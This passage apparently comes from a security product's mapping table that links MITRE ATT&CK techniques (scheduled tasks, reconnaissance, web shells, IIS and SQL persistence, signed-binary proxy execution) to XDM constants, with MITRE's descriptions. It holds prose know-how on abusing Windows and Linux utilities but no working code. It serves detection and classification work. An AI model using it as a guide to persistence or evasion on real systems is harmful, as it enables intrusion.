Task Scheduling in Linux) An adversary may use [at](https://attack.mitre.org/software/S0110) in Linux
environments to execute programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral
Movement and/or to run a process under the context of a specified account. Adversaries may also abuse
[at](https://attack.mitre.org/software/S0110) to break out of restricted environments by using a task to
spawn an interactive system shell or to run system commands. Similarly, [at](https://attack.mitre.org/software/S0110) may also be used for [Privilege Escalation](https://attack.mitre.org/tactics/TA0004) if the
binary is allowed to run as superuser via sudo.(Citation: GTFObins at) https://attack.mitre.org/techniques/T1053/001
T1053.002 XDM_CONST.MITRE_TECHNIQUE_SCHEDULED_TASK_WINDOWS_AT_JOB Adversaries may abuse the at.exe utility to perform task scheduling for initial or recurring execution of
malicious code. The [at](https://attack.mitre.org/software/S0110) utility exists as an executable within
Windows for scheduling tasks at a specified time and date. Using [at](https://attack.mitre.org/software/S0110) requires that the Task Scheduler service be running, and the user to be logged on as a member of
the local Administrators group. An adversary may use at.exe in Windows environments to execute
programs at system startup or on a scheduled basis for persistence. [at](https://attack.mitre.org/software/S0110) can also be abused to conduct remote Execution as part of Lateral Movement and/or to run a
process under the context of a specified account (such as SYSTEM). Note: The at.exe command line
utility has been deprecated in current versions of Windows in favor of schtasks. https://attack.mitre.org/techniques/T1053/002
T1053.007 XDM_CONST.MITRE_TECHNIQUE_SCHEDULED_TASK_OR_CONTAINER_ORCHESTRATION_JOB Adversaries may abuse task scheduling functionality provided by container orchestration tools such as
Kubernetes to schedule deployment of containers configured to execute malicious code. Container
orchestration jobs run these automated tasks at a specific date and time, similar to cron jobs on a Linux
system. Deployments of this type can also be configured to maintain a quantity of containers over time,
automating the process of maintaining persistence within a cluster. In Kubernetes, a CronJob may be used
to schedule a Job that runs one or more containers to perform specific tasks.(Citation: Kubernetes Jobs)
(Citation: Kubernetes CronJob) An adversary therefore may utilize a CronJob to schedule deployment of a
Job that executes malicious code in various nodes within a cluster.(Citation: Threat Matrix for Kubernetes)
https://attack.mitre.org/techniques/T1053/007
T1053.003 XDM_CONST.MITRE_TECHNIQUE_SCHEDULED_TASK_OR_CRON_JOB Adversaries may abuse the cron utility to perform task scheduling for initial or recurring execution of
malicious code.(Citation: 20 macOS Common Tools and Techniques) The cron utility is a time-based job
scheduler for Unix-like operating systems. The crontab file contains the schedule of cron entries to be run
and the specified times for execution. Any crontab files are stored in operating system-specific file paths.
An adversary may use cron in Linux or Unix environments to execute programs at system startup or on a
scheduled basis for persistence. https://attack.mitre.org/techniques/T1053/003
T1053.006 XDM_CONST.MITRE_TECHNIQUE_SCHEDULED_TASK_OR_SYSTEMD_TIMERS Adversaries may abuse systemd timers to perform task scheduling for initial or recurring execution of
malicious code. Systemd timers are unit files with file extension .timer that control services. Timers can be
set to run on a calendar event or after a time span relative to a starting point. They can be used as an
alternative to [Cron](https://attack.mitre.org/techniques/T1053/003) in Linux environments.(Citation:
archlinux Systemd Timers Aug 2020) Systemd timers may be activated remotely via the systemctl
command line utility, which operates over [SSH](https://attack.mitre.org/techniques/T1021/004).(Citation:
Systemd Remote Control) Each .timer file must have a corresponding .service file with the same name,
e.g., example.timer and example.service. .service files are [Systemd Service](https://attack.mitre.org/techniques/T1543/002) unit files that are managed by the systemd system and service manager.(Citation:
Linux man-pages: systemd January 2014) Privileged timers are written to /etc/systemd/system/ and /usr/lib/systemd/system while user-level timers are written to ~/.config/systemd/user/. An adversary may
use systemd timers to execute malicious code at system startup or on a scheduled basis for persistence.
(Citation: Arch Linux Package Systemd Compromise BleepingComputer 10JUL2018)(Citation: gist Arch
package compromise 10JUL2018)(Citation: acroread package compromised Arch Linux Mail 8JUL2018)
Timers installed using privileged paths may be used to maintain root level persistence. Adversaries may
also install user level timers to achieve user level persistence. https://attack.mitre.org/techniques/T1053/006
T1029 XDM_CONST.MITRE_TECHNIQUE_SCHEDULED_TRANSFER Adversaries may schedule data exfiltration to be performed only at certain times of day or at certain
intervals. This could be done to blend traffic patterns with normal activity or availability. When scheduled
exfiltration is used, other exfiltration techniques likely apply as well to transfer the information out of the
network, such as [Exfiltration Over C2 Channel](https://attack.mitre.org/techniques/T1041) or [Exfiltration Over Alternative Protocol](https://attack.mitre.org/techniques/T1048). https://attack.mitre.org/techniques/T1029
T1113 XDM_CONST.MITRE_TECHNIQUE_SCREEN_CAPTURE Adversaries may attempt to take screen captures of the desktop to gather information over the course of an
operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls,
such as CopyFromScreen, xwd, or screencapture.(Citation: CopyFromScreen .NET)(Citation: Antiquated
Mac Malware) https://attack.mitre.org/techniques/T1113
T1597 XDM_CONST.MITRE_TECHNIQUE_SEARCH_CLOSED_SOURCES Adversaries may search and gather information about victims from closed sources that can be used during
targeting. Information about victims may be available for purchase from reputable private sources and
databases, such as paid subscriptions to feeds of technical/threat intelligence data.(Citation: D3Secutrity
CTI Feeds) Adversaries may also purchase information from less-reputable sources such as dark web or
cybercrime blackmarkets.(Citation: ZDNET Selling Data) Adversaries may search in different closed
databases depending on what information they seek to gather. Information from these sources may reveal
opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)),
establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or
[Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). https://attack.mitre.org/techniques/T1597
T1597.002 XDM_CONST.MITRE_TECHNIQUE_SEARCH_CLOSED_SOURCES_PURCHASE_TECHNICAL_DATA Adversaries may purchase technical information about victims that can be used during targeting.
Information about victims may be available for purchase within reputable private sources and databases,
such as paid subscriptions to feeds of scan databases or other data aggregation services. Adversaries may
also purchase information from less-reputable sources such as dark web or cybercrime blackmarkets.
Adversaries may purchase information about their already identified targets, or use purchased data to
discover opportunities for successful breaches. Threat actors may gather various technical details from
purchased data, including but not limited to employee contact information, credentials, or specifics
regarding a victim’s infrastructure.(Citation: ZDNET Selling Data) Information from these sources may
reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex:
[External Remote Services](https://attack.mitre.org/techniques/T1133) or [Valid Accounts](https://attack.mitre.org/techniques/T1078)). https://attack.mitre.org/techniques/T1597/002
T1597.001 XDM_CONST.MITRE_TECHNIQUE_SEARCH_CLOSED_SOURCES_THREAT_INTEL_VENDORS Adversaries may search private data from threat intelligence vendors for information that can be used
during targeting. Threat intelligence vendors may offer paid feeds or portals that offer more data than what
is publicly reported. Although sensitive details (such as customer names and other identifiers) may be
redacted, this information may contain trends regarding breaches such as target industries, attribution
claims, and successful TTPs/countermeasures.(Citation: D3Secutrity CTI Feeds) Adversaries may search
in private threat intelligence vendor data to gather actionable information. Threat actors may seek
information/indicators gathered about their own campaigns, as well as those conducted by other
adversaries that may align with their target industries, capabilities/objectives, or other operational concerns.
Information reported by vendors may also reveal opportunities for other forms of reconnaissance (ex: [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources
(ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190) or [External Remote Services](https://attack.mitre.org/techniques/T1133)). https://attack.mitre.org/techniques/T1597/001
T1596 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_TECHNICAL_DATABASES Adversaries may search freely available technical databases for information about victims that can be used
during targeting. Information about victims may be available in online databases and repositories, such as
registrations of domains/certificates as well as public collections of network data/artifacts gathered from
traffic and/or scans.(Citation: WHOIS)(Citation: DNS Dumpster)(Citation: Circl Passive DNS)(Citation:
Medium SSL Cert)(Citation: SSLShopper Lookup)(Citation: DigitalShadows CDN)(Citation: Shodan)
Adversaries may search in different open databases depending on what information they seek to gather.
Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or
[Trusted Relationship](https://attack.mitre.org/techniques/T1199)). https://attack.mitre.org/techniques/T1596
T1596.004 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_TECHNICAL_DATABASES_CDNS Adversaries may search content delivery network (CDN) data about victims that can be used during
targeting. CDNs allow an organization to host content from a distributed, load balanced array of servers.
CDNs may also allow organizations to customize content delivery based on the requestor’s geographical
region. Adversaries may search CDN data to gather actionable information. Threat actors can use online
resources and lookup tools to harvest information about content servers within a CDN. Adversaries may
also seek and target CDN misconfigurations that leak sensitive information not intended to be hosted and/or do not have the same protection mechanisms (ex: login portals) as the content hosted on the
organization’s website.(Citation: DigitalShadows CDN) Information from these sources may reveal
opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing
operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or
[Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex: [Drive-by Compromise](https://attack.mitre.org/techniques/T1189)). https://attack.mitre.org/techniques/T1596/004
T1596.001 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_TECHNICAL_DATABASES_DNS_OR_PASSIVE_DNS Adversaries may search DNS data for information about victims that can be used during targeting. DNS
information may include a variety of details, including registered name servers as well as records that
outline addressing for a target’s subdomains, mail servers, and other hosts. Adversaries may search DNS
data to gather actionable information. Threat actors can query nameservers for a target organization
directly, or search through centralized repositories of logged DNS query responses (known as passive
DNS).(Citation: DNS Dumpster)(Citation: Circl Passive DNS) Adversaries may also seek and target DNS
misconfigurations/leaks that reveal information about internal networks. Information from these sources
may reveal opportunities for other forms of reconnaissance (ex: [Search Victim-Owned Websites](https://attack.mitre.org/techniques/T1594) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial access (ex:
[External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). https://attack.mitre.org/techniques/T1596/001
T1596.003 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_TECHNICAL_DATABASES_DIGITAL_CERTIFICATES Adversaries may search public digital certificate data for information about victims that can be used during
targeting. Digital certificates are issued by a certificate authority (CA) in order to cryptographically verify the
origin of signed content. These certificates, such as those used for encrypted web traffic (HTTPS SSL/TLS
communications), contain information about the registered organization such as name and location.
Adversaries may search digital certificate data to gather actionable information. Threat actors can use
online resources and lookup tools to harvest information about certificates.(Citation: SSLShopper Lookup)
Digital certificate data may also be available from artifacts signed by the organization (ex: certificates used
from encrypted web traffic are served with content).(Citation: Medium SSL Cert) Information from these
sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)),
establishing operational resources (ex: [Develop Capabilities](https://attack.mitre.org/techniques/T1587) or
[Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). https://attack.mitre.org/techniques/T1596/003
T1596.005 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_TECHNICAL_DATABASES_SCAN_DATABASES Adversaries may search within public scan databases for information about victims that can be used during
targeting. Various online services continuously publish the results of Internet scans/surveys, often
harvesting information such as active IP addresses, hostnames, open ports, certificates, and even server
banners.(Citation: Shodan) Adversaries may search scan databases to gather actionable information.
Threat actors can use online resources and lookup tools to harvest information from these services.
Adversaries may seek information about their already identified targets, or use these datasets to discover
opportunities for successful breaches. Information from these sources may reveal opportunities for other
forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Search Open Websites/Domains](https://attack.mitre.org/techniques/T1593)), establishing operational resources (ex:
[Develop Capabilities](https://attack.mitre.org/techniques/T1587) or [Obtain Capabilities](https://attack.mitre.org/techniques/T1588)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Exploit Public-Facing Application](https://attack.mitre.org/techniques/T1190)). https://attack.mitre.org/techniques/T1596/005
T1596.002 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_TECHNICAL_DATABASES_WHOIS Adversaries may search public WHOIS data for information about victims that can be used during targeting.
WHOIS data is stored by regional Internet registries (RIR) responsible for allocating and assigning Internet
resources such as domain names. Anyone can query WHOIS servers for information about a registered
domain, such as assigned IP blocks, contact information, and DNS nameservers.(Citation: WHOIS)
Adversaries may search WHOIS data to gather actionable information. Threat actors can use online
resources or command-line utilities to pillage through WHOIS data for information about potential victims.
Information from these sources may reveal opportunities for other forms of reconnaissance (ex: [Active Scanning](https://attack.mitre.org/techniques/T1595) or [Phishing for Information](https://attack.mitre.org/techniques/T1598)), establishing operational resources (ex: [Acquire Infrastructure](https://attack.mitre.org/techniques/T1583) or [Compromise Infrastructure](https://attack.mitre.org/techniques/T1584)), and/or initial
access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Trusted Relationship](https://attack.mitre.org/techniques/T1199)). https://attack.mitre.org/techniques/T1596/002
T1593 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_WEBSITES_DOMAINS Adversaries may search freely available websites and/or domains for information about victims that can be
used during targeting. Information about victims may be available in various online sites, such as social
media, news sites, or those hosting information about business operations such as hiring or requested/rewarded contracts.(Citation: Cyware Social Media)(Citation: SecurityTrails Google Hacking)(Citation:
ExploitDB GoogleHacking) Adversaries may search in different online sites depending on what information
they seek to gather. Information from these sources may reveal opportunities for other forms of
reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open
Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex:
[Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [External Remote Services](https://attack.mitre.org/techniques/T1133) or [Phishing](https://attack.mitre.org/techniques/T1566)). https://attack.mitre.org/techniques/T1593
T1593.002 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_WEBSITES_DOMAINS_SEARCH_ENGINES Adversaries may use search engines to collect information about victims that can be used during targeting.
Search engine services typically crawl online sites to index content and may provide users with specialized
syntax to search for specific keywords or specific types of content (i.e. filetypes).(Citation: SecurityTrails
Google Hacking)(Citation: ExploitDB GoogleHacking) Adversaries may craft various search engine queries
depending on what information they seek to gather. Threat actors may use search engines to harvest
general information about victims, as well as use specialized queries to look for spillages/leaks of sensitive
information such as network details or credentials. Information from these sources may reveal opportunities
for other forms of reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598)
or [Search Open Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational
resources (ex: [Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Valid Accounts](https://attack.mitre.org/techniques/T1078) or [Phishing](https://attack.mitre.org/techniques/T1566)). https://attack.mitre.org/techniques/T1593/002
T1593.001 XDM_CONST.MITRE_TECHNIQUE_SEARCH_OPEN_WEBSITES_OR_DOMAINS_SOCIAL_MEDIA Adversaries may search social media for information about victims that can be used during targeting. Social
media sites may contain various information about a victim organization, such as business announcements
as well as information about the roles, locations, and interests of staff. Adversaries may search in different
social media sites depending on what information they seek to gather. Threat actors may passively harvest
data from these sites, as well as use information gathered to create fake profiles/groups to elicit victims into
revealing specific information (i.e. [Spearphishing Service](https://attack.mitre.org/techniques/T1598/001)).
(Citation: Cyware Social Media) Information from these sources may reveal opportunities for other forms of
reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open
Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex:
[Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Spearphishing via Service](https://attack.mitre.org/techniques/T1566/003)). https://attack.mitre.org/techniques/T1593/001
T1594 XDM_CONST.MITRE_TECHNIQUE_SEARCH_VICTIM_OWNED_WEBSITES Adversaries may search websites owned by the victim for information that can be used during targeting.
Victim-owned websites may contain a variety of details, including names of departments/divisions, physical
locations, and data about key employees such as names, roles, and contact info (ex: [Email Addresses](https://attack.mitre.org/techniques/T1589/002)). These sites may also have details highlighting business
operations and relationships.(Citation: Comparitech Leak) Adversaries may search victim-owned websites
to gather actionable information. Information from these sources may reveal opportunities for other forms of
reconnaissance (ex: [Phishing for Information](https://attack.mitre.org/techniques/T1598) or [Search Open
Technical Databases](https://attack.mitre.org/techniques/T1596)), establishing operational resources (ex:
[Establish Accounts](https://attack.mitre.org/techniques/T1585) or [Compromise Accounts](https://attack.mitre.org/techniques/T1586)), and/or initial access (ex: [Trusted Relationship](https://attack.mitre.org/techniques/T1199) or [Phishing](https://attack.mitre.org/techniques/T1566)). https://attack.mitre.org/techniques/T1594
T1505 XDM_CONST.MITRE_TECHNIQUE_SERVER_SOFTWARE_COMPONENT Adversaries may abuse legitimate extensible development features of servers to establish persistent
access to systems. Enterprise server applications may include features that allow developers to write and
install software or scripts to extend the functionality of the main application. Adversaries may install
malicious components to extend and abuse server applications. https://attack.mitre.org/techniques/T1505
T1505.004 XDM_CONST.MITRE_TECHNIQUE_SERVER_SOFTWARE_COMPONENT_IIS_COMPONENTS Adversaries may install malicious components that run on Internet Information Services (IIS) web servers to
establish persistence. IIS provides several mechanisms to extend the functionality of the web servers. For
example, Internet Server Application Programming Interface (ISAPI) extensions and filters can be installed
to examine and/or modify incoming and outgoing IIS web requests. Extensions and filters are deployed as
DLL files that export three functions: Get{Extension/Filter}Version, Http{Extension/Filter}Proc,
and (optionally) Terminate{Extension/Filter}. IIS modules may also be installed to extend IIS web
servers.(Citation: Microsoft ISAPI Extension Overview 2017)(Citation: Microsoft ISAPI Filter Overview
2017)(Citation: IIS Backdoor 2011)(Citation: Trustwave IIS Module 2013) Adversaries may install malicious
ISAPI extensions and filters to observe and/or modify traffic, execute commands on compromised
machines, or proxy command and control traffic. ISAPI extensions and filters may have access to all IIS
web requests and responses. For example, an adversary may abuse these mechanisms to modify HTTP
responses in order to distribute malicious commands/content to previously compromised hosts.(Citation:
Microsoft ISAPI Filter Overview 2017)(Citation: Microsoft ISAPI Extension Overview 2017)(Citation:
Microsoft ISAPI Extension All Incoming 2017)(Citation: Dell TG-3390)(Citation: Trustwave IIS Module 2013)
(Citation: MMPC ISAPI Filter 2012) Adversaries may also install malicious IIS modules to observe and/or
modify traffic. IIS 7.0 introduced modules that provide the same unrestricted access to HTTP requests and
responses as ISAPI extensions and filters. IIS modules can be written as a DLL that exports
RegisterModule, or as a .NET application that interfaces with ASP.NET APIs to access IIS HTTP
requests.(Citation: Microsoft IIS Modules Overview 2007)(Citation: Trustwave IIS Module 2013)(Citation:
ESET IIS Malware 2021) https://attack.mitre.org/techniques/T1505/004
T1505.001 XDM_CONST.MITRE_TECHNIQUE_SERVER_SOFTWARE_COMPONENT_SQL_STORED_PROCEDURES Adversaries may abuse SQL stored procedures to establish persistent access to systems. SQL Stored Procedures are code that can be saved and reused so that database users do not waste time rewriting frequently used SQL queries. Stored procedures can be invoked via SQL statements to the database using the procedure name or via defined events (e.g. when a SQL server application is started/restarted). Adversaries may craft malicious stored procedures that can provide a persistence mechanism in SQL database servers.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019) To execute operating system commands through SQL syntax the adversary may have to enable additional functionality, such as xp_cmdshell for MSSQL Server.(Citation: NetSPI Startup Stored Procedures)(Citation: Kaspersky MSSQL Aug 2019)(Citation: Microsoft xp_cmdshell 2017) Microsoft SQL Server can enable common language runtime (CLR) integration. With CLR integration enabled, application developers can write stored procedures using any .NET framework language (e.g. VB .NET, C#, etc.).(Citation: Microsoft CLR Integration 2017) Adversaries may craft or modify CLR assemblies that are linked to stored procedures since these CLR assemblies can be made to execute arbitrary commands.(Citation: NetSPI SQL Server CLR) https://attack.mitre.org/techniques/T1505/001
T1505.002 XDM_CONST.MITRE_TECHNIQUE_SERVER_SOFTWARE_COMPONENT_TRANSPORT_AGENT Adversaries may abuse Microsoft transport agents to establish persistent access to systems. Microsoft Exchange transport agents can operate on email messages passing through the transport pipeline to perform various tasks such as filtering spam, filtering malicious attachments, journaling, or adding a corporate signature to the end of all outgoing emails.(Citation: Microsoft TransportAgent Jun 2016)(Citation: ESET LightNeuron May 2019) Transport agents can be written by application developers and then compiled to .NET assemblies that are subsequently registered with the Exchange server. Transport agents will be invoked during a specified stage of email processing and carry out developer-defined tasks. Adversaries may register a malicious transport agent to provide a persistence mechanism in Exchange Server that can be triggered by adversary-specified email events.(Citation: ESET LightNeuron May 2019) Though a malicious transport agent may be invoked for all emails passing through the Exchange transport pipeline, the agent can be configured to only carry out specific tasks in response to adversary-defined criteria. For example, the transport agent may only carry out an action like copying in-transit attachments and saving them for later exfiltration if the recipient email address matches an entry on a list provided by the adversary. https://attack.mitre.org/techniques/T1505/002
T1505.003 XDM_CONST.MITRE_TECHNIQUE_SERVER_SOFTWARE_COMPONENT_WEB_SHELL Adversaries may backdoor web servers with web shells to establish persistent access to systems. A Web shell is a Web script that is placed on an openly accessible Web server to allow an adversary to use the Web server as a gateway into a network. A Web shell may provide a set of functions to execute or a command-line interface on the system that hosts the Web server. In addition to a server-side script, a Web shell may have a client interface program that is used to talk to the Web server (ex: [China Chopper](https://attack.mitre.org/software/S0020) Web shell client).(Citation: Lee 2013) https://attack.mitre.org/techniques/T1505/003
Original Mapped Description
T1489 XDM_CONST.MITRE_TECHNIQUE_SERVICE_STOP Adversaries may stop or disable services on a system to render those services unavailable to legitimate users. Stopping critical services or processes can inhibit or stop response to an incident or aid in the adversary's overall objectives to cause damage to the environment.(Citation: Talos Olympic Destroyer 2018)(Citation: Novetta Blockbuster) Adversaries may accomplish this by disabling individual services of high importance to an organization, such as MSExchangeIS, which will make Exchange content inaccessible (Citation: Novetta Blockbuster). In some cases, adversaries may stop or disable many or all services to render systems unusable.(Citation: Talos Olympic Destroyer 2018) Services or processes may not allow for modification of their data stores while running. Adversaries may stop services or processes in order to conduct [Data Destruction](https://attack.mitre.org/techniques/T1485) or [Data Encrypted for Impact](https://attack.mitre.org/techniques/T1486) on the data stores of services like Exchange and SQL Server.(Citation: SecureWorks WannaCry Analysis) https://attack.mitre.org/techniques/T1489
T1129 XDM_CONST.MITRE_TECHNIQUE_SHARED_MODULES Adversaries may execute malicious payloads via loading shared modules. The Windows module loader can be instructed to load DLLs from arbitrary local paths and arbitrary Universal Naming Convention (UNC) network paths. This functionality resides in NTDLL.dll and is part of the Windows [Native API](https://attack.mitre.org/techniques/T1106) which is called from functions like CreateProcess, LoadLibrary, etc. of the Win32 API. (Citation: Wikipedia Windows Library Files) The module loader can load DLLs:
* via specification of the (fully-qualified or relative) DLL pathname in the IMPORT directory;
* via EXPORT forwarded to another DLL, specified with (fully-qualified or relative) pathname (but without extension);
* via an NTFS junction or symlink program.exe.local with the fully-qualified or relative pathname of a directory containing the DLLs specified in the IMPORT directory or forwarded EXPORTs;
* via <file name="filename.extension" loadFrom="fully-qualified or relative pathname"> in an embedded or external "application manifest". The file name refers to an entry in the IMPORT directory or a forwarded EXPORT.
Adversaries may use this functionality as a way to execute arbitrary payloads on a victim system. For example, malware may execute shared modules to load additional components or features. https://attack.mitre.org/techniques/T1129
T1218 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION Adversaries may bypass process and/or signature-based defenses by proxying execution of malicious content with signed binaries. Binaries signed with trusted digital certificates can execute on Windows systems protected by digital signature validation. Several Microsoft signed binaries that are default on Windows installations can be used to proxy execution of other files. https://attack.mitre.org/techniques/T1218
T1218.003 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_CMSTP Adversaries may abuse CMSTP to proxy execution of malicious code. The Microsoft Connection Manager Profile Installer (CMSTP.exe) is a command-line program used to install Connection Manager service profiles. (Citation: Microsoft Connection Manager Oct 2009) CMSTP.exe accepts an installation information file (INF) as a parameter and installs a service profile leveraged for remote access connections. Adversaries may supply CMSTP.exe with INF files infected with malicious commands. (Citation: Twitter CMSTP Usage Jan 2018) Similar to [Regsvr32](https://attack.mitre.org/techniques/T1218/010) / "Squiblydoo", CMSTP.exe may be abused to load and execute DLLs (Citation: MSitPros CMSTP Aug 2017) and/or COM scriptlets (SCT) from remote servers. (Citation: Twitter CMSTP Jan 2018) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) This execution may also bypass AppLocker and other application control defenses since CMSTP.exe is a legitimate, signed Microsoft application. CMSTP.exe can also be abused to [Bypass User Account Control](https://attack.mitre.org/techniques/T1548/002) and execute arbitrary commands from a malicious INF through an auto-elevated COM interface. (Citation: MSitPros CMSTP Aug 2017) (Citation: GitHub Ultimate AppLocker Bypass List) (Citation: Endurant CMSTP July 2018) https://attack.mitre.org/techniques/T1218/003
T1218.001 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_COMPILED_HTML_FILE Adversaries may abuse Compiled HTML files (.chm) to conceal malicious code. CHM files are commonly distributed as part of the Microsoft HTML Help system. CHM files are compressed compilations of various content such as HTML documents, images, and scripting/web related programming languages such as VBA, JScript, Java, and ActiveX. (Citation: Microsoft HTML Help May 2018) CHM content is displayed using underlying components of the Internet Explorer browser (Citation: Microsoft HTML Help ActiveX) loaded by the HTML Help executable program (hh.exe). (Citation: Microsoft HTML Help Executable Program) A custom CHM file containing embedded payloads could be delivered to a victim then triggered by [User Execution](https://attack.mitre.org/techniques/T1204). CHM execution may also bypass application control on older and/or unpatched systems that do not account for execution of binaries through hh.exe. (Citation: MsitPros CHM Aug 2017) (Citation: Microsoft CVE-2017-8625 Aug 2017) https://attack.mitre.org/techniques/T1218/001
T1218.002 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_CONTROL_PANEL Adversaries may abuse control.exe to proxy execution of malicious payloads. The Windows Control Panel process binary (control.exe) handles execution of Control Panel items, which are utilities that allow users to view and adjust computer settings. Control Panel items are registered executable (.exe) or Control Panel (.cpl) files; the latter are actually renamed dynamic-link library (.dll) files that export a CPlApplet function. (Citation: Microsoft Implementing CPL)(Citation: TrendMicro CPL Malware Jan 2014) For ease of use, Control Panel items typically include graphical menus available to users after being registered and loaded into the Control Panel.(Citation: Microsoft Implementing CPL) Control Panel items can be executed directly from the command line, programmatically via an application programming interface (API) call, or by simply double-clicking the file.(Citation: Microsoft Implementing CPL) (Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) Malicious Control Panel items can be delivered via [Phishing](https://attack.mitre.org/techniques/T1566) campaigns(Citation: TrendMicro CPL Malware Jan 2014)(Citation: TrendMicro CPL Malware Dec 2013) or executed as part of multi-stage malware.(Citation: Palo Alto Reaver Nov 2017) Control Panel items, specifically CPL files, may also bypass application and/or file extension allow lists. Adversaries may also rename malicious DLL files (.dll) with Control Panel file extensions (.cpl) and register them to HKCU\Software\Microsoft\Windows\CurrentVersion\Control Panel\Cpls. Even when these registered DLLs do not comply with the CPL file specification and do not export CPlApplet functions, they are loaded and executed through their DllEntryPoint when Control Panel is executed. CPL files not exporting CPlApplet are not directly executable.(Citation: ESET InvisiMole June 2020) https://attack.mitre.org/techniques/T1218/002
T1218.004 XDM_CONST.MITRE_TECHNIQUE_SIGNED_BINARY_PROXY_EXECUTION_INSTALLUTIL Adversaries may use InstallUtil to proxy execution of code through a trusted Windows utility. InstallUtil is a command-line utility that allows for installation and uninstallation of resources by executing specific installer components specified in .NET binaries. (Citation: MSDN InstallUtil) InstallUtil is digitally signed by Microsoft and located in the .NET directories on a Windows system: C:\Windows\Microsoft.NET\Framework\v<version>\InstallUtil.exe and C:\Windows\Microsoft.NET\Framework64\v<version>\InstallUtil.exe. InstallUtil may also be used to bypass application control through use of attributes within the binary that execute the class decorated with the attribute [System.ComponentModel.RunInstaller(true)]. (Citation: LOLBAS Installutil) https://attack.mitre.org/techniques/T1218/004
